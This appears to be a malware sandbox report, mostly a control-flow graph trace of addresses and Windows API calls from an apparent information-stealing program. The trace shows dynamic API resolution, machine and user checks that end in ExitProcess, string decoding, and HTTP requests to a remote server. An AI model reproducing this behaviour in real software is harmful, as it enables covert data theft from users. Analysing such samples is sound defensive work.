API calls 29477->29478 29479 403492 29478->29479 29480 4045c0 34 API calls 29479->29480 29481 4034ab 29480->29481 29482 4045c0 34 API calls 29481->29482 29483 4034c4 29482->29483 29484 4045c0 34 API calls 29483->29484 29485 4034dd 29484->29485 29486 4045c0 34 API calls 29485->29486 29487 4034f6 29486->29487 29488 4045c0 34 API calls 29487->29488 29489 40350f 29488->29489 29490 4045c0 34 API calls 29489->29490 29491 403528 29490->29491 29492 4045c0 34 API calls 29491->29492 29493 403541 29492->29493 29494 4045c0 34 API calls 29493->29494 29495 40355a 29494->29495 29496 4045c0 34 API calls 29495->29496 29497 403573 29496->29497 29498 4045c0 34 API calls 29497->29498 29499 40358c 29498->29499 29500 4045c0 34 API calls 29499->29500 29501 4035a5 29500->29501 29502 4045c0 34 API calls 29501->29502 29503 4035be 29502->29503 29504 4045c0 34 API calls 29503->29504 29505 4035d7 29504->29505 29506 4045c0 34 API calls 29505->29506 29507 4035f0 29506->29507 29508 4045c0 34 API calls 29507->29508 29509 403609 29508->29509 29510 4045c0 34 API calls 29509->29510 29511 403622 29510->29511 29512 4045c0 34 API calls 29511->29512 29513 40363b 29512->29513 29514 4045c0 34 API calls 29513->29514 29515 403654 29514->29515 29516 4045c0 34 API calls 29515->29516 29517 40366d 29516->29517 29518 4045c0 34 API calls 29517->29518 29519 403686 29518->29519 29520 4045c0 34 API calls 29519->29520 29521 40369f 29520->29521 29522 4045c0 34 API calls 29521->29522 29523 4036b8 29522->29523 29524 4045c0 34 API calls 29523->29524 29525 4036d1 29524->29525 29526 4045c0 34 API calls 29525->29526 29527 4036ea 29526->29527 29528 4045c0 34 API calls 29527->29528 29529 403703 29528->29529 29530 4045c0 34 API calls 29529->29530 29531 40371c 29530->29531 29532 4045c0 34 API calls 29531->29532 29533 403735 29532->29533 29534 4045c0 34 API calls 29533->29534 29535 40374e 29534->29535 29536 4045c0 34 API calls 29535->29536 29537 403767 29536->29537 29538 4045c0 34 API calls 29537->29538 29539 403780 29538->29539 29540 4045c0 34 API calls 29539->29540 29541 403799 29540->29541 29542 4045c0 34 API calls 29541->29542 29543 4037b2 29542->29543 29544 4045c0 34 API calls 29543->29544 29545 4037cb 29544->29545 29546 4045c0 34 API calls 29545->29546 29547 4037e4 29546->29547 29548 4045c0 34 API calls 29547->29548 29549 4037fd 29548->29549 29550 4045c0 34 API calls 29549->29550 29551 403816 29550->29551 29552 4045c0 34 API calls 29551->29552 29553 40382f 29552->29553 29554 4045c0 34 API calls 29553->29554 29555 403848 29554->29555 29556 4045c0 34 API calls 29555->29556 29557 403861 29556->29557 29558 4045c0 34 API calls 29557->29558 29559 40387a 29558->29559 29560 4045c0 34 API calls 29559->29560 29561 403893 29560->29561 29562 4045c0 34 API calls 29561->29562 29563 4038ac 29562->29563 29564 4045c0 34 API calls 29563->29564 29565 4038c5 29564->29565 29566 4045c0 34 API calls 29565->29566 29567 4038de 29566->29567 29568 4045c0 34 API calls 29567->29568 29569 4038f7 29568->29569 29570 4045c0 34 API calls 29569->29570 29571 403910 29570->29571 29572 4045c0 34 API calls 29571->29572 29573 403929 29572->29573 29574 4045c0 34 API calls 29573->29574 29575 403942 29574->29575 29576 4045c0 34 API calls 29575->29576 29577 40395b 29576->29577 29578 4045c0 34 API calls 29577->29578 29579 403974 29578->29579 29580 4045c0 34 API calls 29579->29580 29581 40398d 29580->29581 29582 4045c0 34 API calls 29581->29582 29583 4039a6 29582->29583 29584 4045c0 34 API calls 29583->29584 29585 4039bf 29584->29585 29586 4045c0 34 API calls 29585->29586 29587 4039d8 29586->29587 29588 4045c0 34 API calls 29587->29588 29589 4039f1 29588->29589 29590 4045c0 34 API calls 29589->29590 29591 403a0a 29590->29591 29592 4045c0 34 API calls 29591->29592 29593 403a23 29592->29593 29594 4045c0 34 API calls 29593->29594 29595 403a3c 29594->29595 29596 4045c0 34 API calls 29595->29596 29597 403a55 29596->29597 29598 4045c0 34 API calls 29597->29598 29599 403a6e 29598->29599 29600 4045c0 34 API calls 29599->29600 29601 403a87 29600->29601 29602 4045c0 34 API calls 29601->29602 29603 403aa0 29602->29603 29604 4045c0 34 API calls 29603->29604 29605 403ab9 29604->29605 29606 4045c0 34 API calls 29605->29606 29607 403ad2 29606->29607 29608 4045c0 34 API calls 29607->29608 29609 403aeb 29608->29609 29610 4045c0 34 API calls 29609->29610 29611 403b04 29610->29611 29612 4045c0 34 API calls 29611->29612 29613 403b1d 29612->29613 29614 4045c0 34 API calls 29613->29614 29615 403b36 29614->29615 29616 4045c0 34 API calls 29615->29616 29617 403b4f 29616->29617 29618 4045c0 34 API calls 29617->29618 29619 403b68 29618->29619 29620 4045c0 34 API calls 29619->29620 29621 403b81 29620->29621 29622 4045c0 34 API calls 29621->29622 29623 403b9a 29622->29623 29624 4045c0 34 API calls 29623->29624 29625 403bb3 29624->29625 29626 4045c0 34 API calls 29625->29626 29627 403bcc 29626->29627 29628 4045c0 34 API calls 29627->29628 29629 403be5 29628->29629 29630 4045c0 34 API calls 29629->29630 29631 403bfe 29630->29631 29632 4045c0 34 API calls 29631->29632 29633 403c17 29632->29633 29634 4045c0 34 API calls 29633->29634 29635 403c30 29634->29635 29636 4045c0 34 API calls 29635->29636 29637 403c49 29636->29637 29638 4045c0 34 API calls 29637->29638 29639 403c62 29638->29639 29640 4045c0 34 API calls 29639->29640 29641 403c7b 29640->29641 29642 4045c0 34 API calls 29641->29642 29643 403c94 29642->29643 29644 4045c0 34 API calls 29643->29644 29645 403cad 29644->29645 29646 4045c0 34 API calls 29645->29646 29647 403cc6 29646->29647 29648 4045c0 34 API calls 29647->29648 29649 403cdf 29648->29649 29650 4045c0 34 API calls 29649->29650 29651 403cf8 29650->29651 29652 4045c0 34 API calls 29651->29652 29653 403d11 29652->29653 29654 4045c0 34 API calls 29653->29654 29655 403d2a 29654->29655 29656 4045c0 34 API calls 29655->29656 29657 403d43 29656->29657 29658 4045c0 34 API calls 29657->29658 29659 403d5c 29658->29659 29660 4045c0 34 API calls 29659->29660 29661 403d75 29660->29661 29662 4045c0 34 API calls 29661->29662 29663 403d8e 29662->29663 29664 4045c0 34 API calls 29663->29664 29665 403da7 29664->29665 29666 4045c0 34 API calls 29665->29666 29667 403dc0 29666->29667 29668 4045c0 34 API calls 29667->29668 29669 403dd9 29668->29669 29670 4045c0 34 API calls 29669->29670 29671 403df2 29670->29671 29672 4045c0 34 API calls 29671->29672 29673 403e0b 29672->29673 29674 4045c0 34 API calls 29673->29674 29675 403e24 29674->29675 29676 4045c0 34 API calls 29675->29676 29677 403e3d 29676->29677 29678 4045c0 34 API calls 29677->29678 29679 403e56 29678->29679 29680 4045c0 34 API calls 29679->29680 29681 403e6f 29680->29681 29682 4045c0 34 API calls 29681->29682 29683 403e88 29682->29683 29684 4045c0 34 API calls 29683->29684 29685 403ea1 29684->29685 29686 4045c0 34 API calls 29685->29686 29687 403eba 29686->29687 29688 4045c0 34 API calls 29687->29688 29689 403ed3 29688->29689 29690 4045c0 34 API calls 29689->29690 29691 403eec 29690->29691 29692 4045c0 34 API calls 29691->29692 29693 403f05 29692->29693 29694 4045c0 34 API calls 29693->29694 29695 403f1e 29694->29695 29696 4045c0 34 API calls 29695->29696 29697 403f37 29696->29697 29698 4045c0 34 API calls 29697->29698 29699 403f50 29698->29699 29700 4045c0 34 API calls 29699->29700 29701 403f69 29700->29701 29702 4045c0 34 API calls 29701->29702 29703 403f82 29702->29703 29704 4045c0 34 API calls 29703->29704 29705 403f9b 29704->29705 29706 4045c0 34 API calls 29705->29706 29707 403fb4 29706->29707 29708 4045c0 34 API calls 29707->29708 29709 403fcd 29708->29709 29710 4045c0 34 API calls 29709->29710 29711 403fe6 29710->29711 29712 4045c0 34 API calls 29711->29712 29713 403fff 29712->29713 29714 4045c0 34 API calls 29713->29714 29715 404018 29714->29715 29716 4045c0 34 API calls 29715->29716 29717 404031 29716->29717 29718 4045c0 34 API calls 29717->29718 29719 40404a 29718->29719 29720 4045c0 34 API calls 29719->29720 29721 404063 29720->29721 29722 4045c0 34 API calls 29721->29722 29723 40407c 29722->29723 29724 4045c0 34 API calls 29723->29724 29725 404095 29724->29725 29726 4045c0 34 API calls 29725->29726 29727 4040ae 29726->29727 29728 4045c0 34 API calls 29727->29728 29729 4040c7 29728->29729 29730 4045c0 34 API calls 29729->29730 29731 4040e0 29730->29731 29732 4045c0 34 API calls 29731->29732 29733 4040f9 29732->29733 29734 4045c0 34 API calls 29733->29734 29735 404112 29734->29735 29736 4045c0 34 API calls 29735->29736 29737 40412b 29736->29737 29738 4045c0 34 API calls 29737->29738 29739 404144 29738->29739 29740 4045c0 34 API calls 29739->29740 29741 40415d 29740->29741 29742 4045c0 34 API calls 29741->29742 29743 404176 29742->29743 29744 4045c0 34 API calls 29743->29744 29745 40418f 29744->29745 29746 4045c0 34 API calls 29745->29746 29747 4041a8 29746->29747 29748 4045c0 34 API calls 29747->29748 29749 4041c1 29748->29749 29750 4045c0 34 API calls 29749->29750 29751 4041da 29750->29751 29752 4045c0 34 API calls 29751->29752 29753 4041f3 29752->29753 29754 4045c0 34 API calls 29753->29754 29755 40420c 29754->29755 29756 4045c0 34 API calls 29755->29756 29757 404225 29756->29757 29758 4045c0 34 API calls 29757->29758 29759 40423e 29758->29759 29760 4045c0 34 API calls 29759->29760 29761 404257 29760->29761 29762 4045c0 34 API calls 29761->29762 29763 404270 29762->29763 29764 4045c0 34 API calls 29763->29764 29765 404289 29764->29765 29766 4045c0 34 API calls 29765->29766 29767 4042a2 29766->29767 29768 4045c0 34 API calls 29767->29768 29769 4042bb 29768->29769 29770 4045c0 34 API calls 29769->29770 29771 4042d4 29770->29771 29772 4045c0 34 API calls 29771->29772 29773 4042ed 29772->29773 29774 4045c0 34 API calls 29773->29774 29775 404306 29774->29775 29776 4045c0 34 API calls 29775->29776 29777 40431f 29776->29777 29778 4045c0 34 API calls 29777->29778 29779 404338 29778->29779 29780 4045c0 34 API calls 29779->29780 29781 404351 29780->29781 29782 4045c0 34 API calls 29781->29782 29783 40436a 29782->29783 29784 4045c0 34 API calls 29783->29784 29785 404383 29784->29785 29786 4045c0 34 API calls 29785->29786 29787 40439c 29786->29787 29788 4045c0 34 API calls 29787->29788 29789 4043b5 29788->29789 29790 4045c0 34 API calls 29789->29790 29791 4043ce 29790->29791 29792 4045c0 34 API calls 29791->29792 29793 4043e7 29792->29793 29794 4045c0 34 API calls 29793->29794 29795 404400 29794->29795 29796 4045c0 34 API calls 29795->29796 29797 404419 29796->29797 29798 4045c0 34 API calls 29797->29798 29799 404432 29798->29799 29800 4045c0 34 API calls 29799->29800 29801 40444b 29800->29801 29802 4045c0 34 API calls 29801->29802 29803 404464 29802->29803 29804 4045c0 34 API calls 29803->29804 29805 40447d 29804->29805 29806 4045c0 34 API calls 29805->29806 29807 404496 29806->29807 29808 4045c0 34 API calls 29807->29808 29809 4044af 29808->29809 29810 4045c0 34 API calls 29809->29810 29811 4044c8 29810->29811 29812 4045c0 34 API calls 29811->29812 29813 4044e1 29812->29813 29814 4045c0 34 API calls 29813->29814 29815 4044fa 29814->29815 29816 4045c0 34 API calls 29815->29816 29817 404513 29816->29817 29818 4045c0 34 API calls 29817->29818 29819 40452c 29818->29819 29820 4045c0 34 API calls 29819->29820 29821 404545 29820->29821 29822 4045c0 34 API calls 29821->29822 29823 40455e 29822->29823 29824 4045c0 34 API calls 29823->29824 29825 404577 29824->29825 29826 4045c0 34 API calls 29825->29826 29827 404590 29826->29827 29828 4045c0 34 API calls 29827->29828 29829 4045a9 29828->29829 29830 419c10 29829->29830 29831 419c20 43 API calls 29830->29831 29832 41a036 8 API calls 29830->29832 29831->29832 29833 41a146 29832->29833 29834 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29832->29834 29835 41a153 8 API calls 29833->29835 29836 41a216 29833->29836 29834->29833 29835->29836 29837 41a298 29836->29837 29838 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29836->29838 29839 41a2a5 6 API calls 29837->29839 29840 41a337 29837->29840 29838->29837 29839->29840 29841 41a344 9 API calls 29840->29841 29842 41a41f 29840->29842 29841->29842 29843 41a4a2 29842->29843 29844 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29842->29844 29845 41a4ab GetProcAddress GetProcAddress 29843->29845 29846 41a4dc 29843->29846 29844->29843 29845->29846 29847 41a515 29846->29847 29848 41a4e5 GetProcAddress GetProcAddress 29846->29848 29849 41a612 29847->29849 29850 41a522 10 API calls 29847->29850 29848->29847 29851 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29849->29851 29852 41a67d 29849->29852 29850->29849 29851->29852 29853 41a686 GetProcAddress 29852->29853 29854 41a69e 29852->29854 29853->29854 29855 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29854->29855 29856 415ca3 29854->29856 29855->29856 29857 401590 29856->29857 30130 401670 29857->30130 29860 41a7a0 lstrcpy 29861 4015b5 29860->29861 29862 41a7a0 lstrcpy 29861->29862 29863 4015c7 29862->29863 29864 41a7a0 lstrcpy 29863->29864 29865 4015d9 29864->29865 29866 41a7a0 lstrcpy 29865->29866 29867 401663 29866->29867 29868 415510 29867->29868 29869 415521 29868->29869 29870 41a820 2 API calls 29869->29870 29871 41552e 29870->29871 29872 41a820 2 API calls 29871->29872 29873 41553b 29872->29873 29874 41a820 2 API calls 29873->29874 29875 415548 29874->29875 29876 41a740 lstrcpy 29875->29876 29877 415555 29876->29877 29878 41a740 lstrcpy 29877->29878 29879 415562 29878->29879 29880 41a740 lstrcpy 29879->29880 29881 41556f 29880->29881 29882 41a740 lstrcpy 29881->29882 29922 41557c 29882->29922 29883 41a740 lstrcpy 29883->29922 29884 41a8a0 lstrcpy 29884->29922 29885 415643 StrCmpCA 29885->29922 29886 4156a0 StrCmpCA 29887 4157dc 29886->29887 29886->29922 29888 41a8a0 lstrcpy 29887->29888 29889 4157e8 29888->29889 29890 41a820 2 API calls 29889->29890 29892 4157f6 29890->29892 29891 41a820 lstrlenA lstrcpy 29891->29922 29894 41a820 2 API calls 29892->29894 29893 415856 StrCmpCA 29895 415991 29893->29895 29893->29922 29897 415805 29894->29897 29896 41a8a0 lstrcpy 29895->29896 29899 41599d 29896->29899 29900 401670 lstrcpy 29897->29900 29898 401590 lstrcpy 29898->29922 29901 41a820 2 API calls 29899->29901 29921 415811 29900->29921 29904 4159ab 29901->29904 29902 4152c0 29 API calls 29902->29922 29903 4151f0 23 API calls 29903->29922 29906 41a820 2 API calls 29904->29906 29905 415a0b StrCmpCA 29907 415a16 Sleep 29905->29907 29908 415a28 29905->29908 29909 4159ba 29906->29909 29907->29922 29910 41a8a0 lstrcpy 29908->29910 29911 401670 lstrcpy 29909->29911 29912 415a34 29910->29912 29911->29921 29913 41a820 2 API calls 29912->29913 29914 415a43 29913->29914 29915 41a820 2 API calls 29914->29915 29916 415a52 29915->29916 29918 401670 lstrcpy 29916->29918 29917 41578a StrCmpCA 29917->29922 29918->29921 29919 41a7a0 lstrcpy 29919->29922 29920 41593f StrCmpCA 29920->29922 29921->28978 29922->29883 29922->29884 29922->29885 29922->29886 29922->29891 29922->29893 29922->29898 29922->29902 29922->29903 29922->29905 29922->29917 29922->29919 29922->29920 29924 417553 GetVolumeInformationA 29923->29924 29925 41754c 29923->29925 29926 417591 29924->29926 29925->29924 29927 4175fc GetProcessHeap HeapAlloc 29926->29927 29928 417619 29927->29928 29929 417628 wsprintfA 29927->29929 29930 41a740 lstrcpy 29928->29930 29931 41a740 lstrcpy 29929->29931 29932 415da7 29930->29932 29931->29932 29932->28999 29934 41a7a0 lstrcpy 29933->29934 29935 404899 29934->29935 30139 4047b0 29935->30139 29937 4048a5 29938 41a740 lstrcpy 29937->29938 29939 4048d7 29938->29939 29940 41a740 lstrcpy 29939->29940 29941 4048e4 29940->29941 29942 41a740 lstrcpy 29941->29942 29943 4048f1 29942->29943 29944 41a740 lstrcpy 29943->29944 29945 4048fe 29944->29945 29946 41a740 lstrcpy 29945->29946 29947 40490b InternetOpenA StrCmpCA 29946->29947 29948 404944 29947->29948 29949 404ecb InternetCloseHandle 29948->29949 30147 418b60 29948->30147 29951 404ee8 29949->29951 30162 409ac0 CryptStringToBinaryA 29951->30162 29952 404963 30155 41a920 29952->30155 29955 404976 29957 41a8a0 lstrcpy 29955->29957 29962 40497f 29957->29962 29958 41a820 2 API calls 29959 404f05 29958->29959 29961 41a9b0 4 API calls 29959->29961 29960 404f27 codecvt 29965 41a7a0 lstrcpy 29960->29965 29963 404f1b 29961->29963 29966 41a9b0 4 API calls 29962->29966 29964 41a8a0 lstrcpy 29963->29964 29964->29960 29977 404f57 29965->29977 29967 4049a9 29966->29967 29968 41a8a0 lstrcpy 29967->29968 29969 4049b2 29968->29969 29970 41a9b0 4 API calls 29969->29970 29971 4049d1 29970->29971 29972 41a8a0 lstrcpy 29971->29972 29973 4049da 29972->29973 29974 41a920 3 API calls 29973->29974 29975 4049f8 29974->29975 29976 41a8a0 lstrcpy 29975->29976 29978 404a01 29976->29978 29977->29002 29979 41a9b0 4 API calls 29978->29979 29980 404a20 29979->29980 29981 41a8a0 lstrcpy 29980->29981 29982 404a29 29981->29982 29983 41a9b0 4 API calls 29982->29983 29984 404a48 29983->29984 29985 41a8a0 lstrcpy 29984->29985 29986 404a51 29985->29986 29987 41a9b0 4 API calls 29986->29987 29988 404a7d 29987->29988 29989 41a920 3 API calls 29988->29989 29990 404a84 29989->29990 29991 41a8a0 lstrcpy 29990->29991 29992 404a8d 29991->29992 29993 404aa3 InternetConnectA 29992->29993 29993->29949 29994 404ad3 HttpOpenRequestA 29993->29994 29996 404b28 29994->29996 29997 404ebe InternetCloseHandle 29994->29997 29998 41a9b0 4 API calls 29996->29998 29997->29949 29999 404b3c 29998->29999 30000 41a8a0 lstrcpy 29999->30000 30001 404b45 30000->30001 30002 41a920 3 API calls 30001->30002 30003 404b63 30002->30003 30004 41a8a0 lstrcpy 30003->30004 30005 404b6c 30004->30005 30006 41a9b0 4 API calls 30005->30006 30007 404b8b 30006->30007 30008 41a8a0 lstrcpy 30007->30008 30009 404b94 30008->30009 30010 41a9b0 4 API calls 30009->30010 30011 404bb5 30010->30011 30012 41a8a0 lstrcpy 30011->30012 30013 404bbe 30012->30013 30014 41a9b0 4 API calls 30013->30014 30015 404bde 30014->30015 30016 41a8a0 lstrcpy 30015->30016 30017 404be7 30016->30017 30018 41a9b0 4 API calls 30017->30018 30019 404c06 30018->30019 30020 41a8a0 lstrcpy 30019->30020 30021 404c0f 30020->30021 30022 41a920 3 API calls 30021->30022 30023 404c2d 30022->30023 30024 41a8a0 lstrcpy 30023->30024 30025 404c36 30024->30025 30026 41a9b0 4 API calls 30025->30026 30027 404c55 30026->30027 30028 41a8a0 lstrcpy 30027->30028 30029 404c5e 30028->30029 30030 41a9b0 4 API calls 30029->30030 30031 404c7d 30030->30031 30032 41a8a0 lstrcpy 30031->30032 30033 404c86 30032->30033 30034 41a920 3 API calls 30033->30034 30035 404ca4 30034->30035 30036 41a8a0 lstrcpy 30035->30036 30037 404cad 30036->30037 30038 41a9b0 4 API calls 30037->30038 30039 404ccc 30038->30039 30040 41a8a0 lstrcpy 30039->30040 30041 404cd5 30040->30041 30042 41a9b0 4 API calls 30041->30042 30043 404cf6 30042->30043 30044 41a8a0 lstrcpy 30043->30044 30045 404cff 30044->30045 30046 41a9b0 4 API calls 30045->30046 30047 404d1f 30046->30047 30048 41a8a0 lstrcpy 30047->30048 30049 404d28 30048->30049 30050 41a9b0 4 API calls 30049->30050 30051 404d47 30050->30051 30052 41a8a0 lstrcpy 30051->30052 30053 404d50 30052->30053 30054 41a920 3 API calls 30053->30054 30055 404d6e 30054->30055 30056 41a8a0 lstrcpy 30055->30056 30057 404d77 30056->30057 30058 41a740 lstrcpy 30057->30058 30059 404d92 30058->30059 30060 41a920 3 API calls 30059->30060 30061 404db3 30060->30061 30062 41a920 3 API calls 30061->30062 30063 404dba 30062->30063 30064 41a8a0 lstrcpy 30063->30064 30065 404dc6 30064->30065 30066 404de7 lstrlenA 30065->30066 30067 404dfa 30066->30067 30068 404e03 lstrlenA 30067->30068 30161 41aad0 30068->30161 30070 404e13 HttpSendRequestA 30071 404e32 InternetReadFile 30070->30071 30072 404e67 InternetCloseHandle 30071->30072 30077 404e5e 30071->30077 30074 41a800 30072->30074 30074->29997 30075 41a9b0 4 API calls 30075->30077 30076 41a8a0 lstrcpy 30076->30077 30077->30071 30077->30072 30077->30075 30077->30076 30171 41aad0 30078->30171 30080 4117c4 StrCmpCA 30081 4117d7 30080->30081 30082 4117cf ExitProcess 30080->30082 30083 4117e7 strtok_s 30081->30083 30086 4117f4 30083->30086 30084 4119c2 30084->29004 30085 41199e strtok_s 30085->30086 30086->30084 30086->30085 30087 4118ad StrCmpCA 30086->30087 30088 4118cf StrCmpCA 30086->30088 30089 4118f1 StrCmpCA 30086->30089 30090 411951 StrCmpCA 30086->30090 30091 411970 StrCmpCA 30086->30091 30092 411913 StrCmpCA 30086->30092 30093 411932 StrCmpCA 30086->30093 30094 41185d StrCmpCA 30086->30094 30095 41187f StrCmpCA 30086->30095 30096 41a820 lstrlenA lstrcpy 30086->30096 30097 41a820 2 API calls 30086->30097 30087->30086 30088->30086 30089->30086 30090->30086 30091->30086 30092->30086 30093->30086 30094->30086 30095->30086 30096->30086 30097->30085 30098->29010 30099->29012 30100->29018 30101->29020 30102->29026 30103->29028 30104->29032 30105->29036 30106->29040 30107->29046 30108->29048 30109->29052 30110->29066 30111->29069 30112->29070 30113->29065 30114->29070 30115->29085 30116->29073 30117->29076 30118->29079 30119->29082 30120->29087 30121->29095 30122->29101 30123->29121 30124->29125 30125->29124 30126->29120 30127->29124 30128->29134 30131 41a7a0 lstrcpy 30130->30131 30132 401683 30131->30132 30133 41a7a0 lstrcpy 30132->30133 30134 401695 30133->30134 30135 41a7a0 lstrcpy 30134->30135 30136 4016a7 30135->30136 30137 41a7a0 lstrcpy 30136->30137 30138 4015a3 30137->30138 30138->29860 30167 401030 30139->30167 30143 404838 lstrlenA 30170 41aad0 30143->30170 30145 404848 InternetCrackUrlA 30146 404867 30145->30146 30146->29937 30148 41a740 lstrcpy 30147->30148 30149 418b74 30148->30149 30150 41a740 lstrcpy 30149->30150 30151 418b82 GetSystemTime 30150->30151 30152 418b99 30151->30152 30153 41a7a0 lstrcpy 30152->30153 30154 418bfc 30153->30154 30154->29952 30156 41a931 30155->30156 30157 41a988 30156->30157 30159 41a968 lstrcpy lstrcatA 30156->30159 30158 41a7a0 lstrcpy 30157->30158 30160 41a994 30158->30160 30159->30157 30160->29955 30161->30070 30163 409af9 LocalAlloc 30162->30163 30164 404eee 30162->30164 30163->30164 30165 409b14 CryptStringToBinaryA 30163->30165 30164->29958 30164->29960 30165->30164 30166 409b39 LocalFree 30165->30166 30166->30164 30168 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 30167->30168 30169 41aad0 30168->30169 30169->30143 30170->30145 30171->30080 30298 416ab1 826 API calls 30266 4069f3 7 API calls 30239 22f0297 149 API calls 30240 22fae93 43 API calls ctype 30300 41cafe 219 API calls 4 library calls 30302 22fcce9 162 API calls ___crtLCMapStringA 30335 22f19e7 StrCmpCA ExitProcess strtok_s strtok_s 30336 22f35e4 9 API calls 28743 401190 28750 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 28743->28750 28745 40119e 28746 4011cc 28745->28746 28752 417850 GetProcessHeap HeapAlloc GetUserNameA 28745->28752 28748 4011b7 28748->28746 28749 4011c4 ExitProcess 28748->28749 28751 417939 28750->28751 28751->28745 28753 4178c3 28752->28753 28753->28748 30303 22f30f9 7 API calls 30304 41ce9f 69 API calls __amsg_exit 30243 4088a4 RaiseException task __CxxThrowException@8 30244 4180a5 GetProcessHeap HeapFree 30268 22f13c7 strtok_s strtok_s 30270 407dad 75 API calls codecvt 30271 41b9b0 RtlUnwind 30309 22f3823 8 API calls 30311 22f30d0 9 API calls

                                        Control-flow Graph

                                        APIs
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                        • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                        • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                        • strlen.MSVCRT ref: 004046F0
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
